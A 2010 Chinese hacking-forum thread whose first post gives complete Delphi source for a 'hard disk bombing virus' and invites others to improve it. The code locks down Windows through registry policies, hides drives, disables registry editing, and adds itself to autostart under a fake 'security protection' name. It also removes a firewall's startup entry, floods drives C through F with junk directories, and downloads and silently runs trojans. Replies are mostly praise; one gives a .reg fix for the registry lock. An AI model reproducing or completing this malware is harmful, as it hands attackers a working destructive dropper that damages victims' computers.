硬盘轰炸病毒代码
[i=s] 本帖最后由 天狼星 于 2010-2-25 16:47 编辑 [/i]硬盘轰炸病毒的简单代码--完整实现部分;用Delphi编写,希望有人能够完善下!
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,registry, StdCtrls,urlmon;
type
TForm1 = class(TForm)
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.FormCreate(Sender: TObject);
var
reg:tregistry;
wenjian:integer;
begin
//-------------------------------------------------------------------------------
begin //修改注册表,禁止“运行”菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoRun','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止“关闭”菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoClose','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,隐藏所有逻辑盘符
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoDrives','63000000');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止注册表编辑
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',false) then
begin
reg.WriteString('DisableRegistryTools','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止“注销”菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoLogOff','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止“任务栏和开始”菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoSetTaskBar','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止右键菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoViewContextMenu','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止控制面板
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoSetFolders','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,改为用txt文件的关联
reg:=tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
try
if reg.OpenKey('Software\CLASSES\',false) then
begin
reg.WriteString('.reg','txtfile');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,设置开机提示框标题
reg:=tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Winlogon',false) then
begin
reg.WriteString('LegalNoticeCaption','警告');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,设置开机提示框文本内容
reg:=tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Winlogon',false) then
begin
reg.WriteString('LegalNoticeText','中毒了~~~');
end;
finally
reg.CloseKey ;
end;
end;
//------------------------------------------------------------------------------
begin
reg:=tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
if reg.OpenKey('software\microsoft\windows\currentversion\run',true) then //程序自启动
begin
if reg.ReadString('安全防护')='' then
reg.WriteString('安全防护',application.exename)
end;
try
if reg.OpenKey('software\microsoft\windows\currentversion\run',false) then //删除天网防火墙启动项
begin
reg.DeleteValue('SKYNET Personal FireWall');
reg.CloseKey ;
end;
finally
begin
reg.RootKey :=HKEY_CURRENT_USER;
if reg.OpenKey('software\microsoft\windows\currentversion\run',true) then
reg.WriteString('安全防护',application.ExeName );
reg.Free;
end;
end;
form1.Visible :=false; //设置不可见 ------------------------
application.ShowMainForm :=false; //设置不可见-----------------------
for wenjian:=-32768 to 32767 do
begin
winexec(pchar('cmd.exe /c md '+'c:\' +inttostr(wenjian)+'..\'),sw_hide); //向硬盘中大量写入垃圾文件
winexec(pchar('cmd.exe /c md '+'d:\' +inttostr(wenjian)+'..\'),sw_hide);
winexec(pchar('cmd.exe /c md '+'e:\' +inttostr(wenjian)+'..\'),sw_hide);
winexec(pchar('cmd.exe /c md '+'f:\' +inttostr(wenjian)+'..\'),sw_hide);
application.ProcessMessages ;
end;
for wenjian:=1 to 100 do
begin
application.ProcessMessages;
urldownloadtofile(nil,pchar(url),pchar('下载到本地病毒程序路径'),0,nil); //下载木马病毒
urldownloadtofile(nil,pchar(url),pchar('c:\windows\system32\muma2.exe'),0,nil);
urldownloadtofile(nil,pchar(url),pchar('c:\windows\system32\bingdu1.exe'),0,nil);
urldownloadtofile(nil,pchar(url),pchar('c:\windows\system32\bingdu2.exe'),0,nil);
end;
begin
winexec(pchar('cmd.exe /c c:\windows\system32\muma1.exe'),sw_hide); //执行木马病毒
winexec(pchar('cmd.exe /c c:\windows\system32\muma2.exe'),sw_hide);
winexec(pchar('cmd.exe /c c:\windows\system32\bingdu1.exe'),sw_hide);
winexec(pchar('cmd.exe /c c:\windows\system32\bingdu2.exe'),sw_hide);
end;
end;
end;
end. 呵呵呵 是自己的 吗 哈哈~~ 板凳? 明白 了哦。谢 谢 今天晚上有时间来看看吧 我是想完善的
但是下面的应该很长的 啊啊啊,看不懂啊
真羡慕你们 不错!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [color=Red]支持一个[/color] 还不如硬盘格式化炸弹 哈哈 厉害 很有启发 以后中毒也不怕了 好像关键步骤在禁止注册表上 那么我们就先解除注册表锁 用记事本编写
REGEDIT4
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
"DisableRegistryTools"=dword:00000000
以.reg保存 然后进注册表改相关键值 就ok啦 哈哈 很有收获 谢谢 看得 不是很懂 但是慢慢研究 太正确啦!楼主果然英明!不得不赞美你一下! **** 作者被禁止或删除 内容自动屏蔽 **** 这个…真的不懂…羡慕你们…
继续学习中… [b]回复 [url=http://bbs.isbase.net/redirect.php?goto=findpost&pid=242338&ptid=40588]2#[/url] [i]wd102185[/i] [/b]
啊!老乡啊! 邪恶………………………………………………………… 看来来要好好学习编程语言了
页:
[1]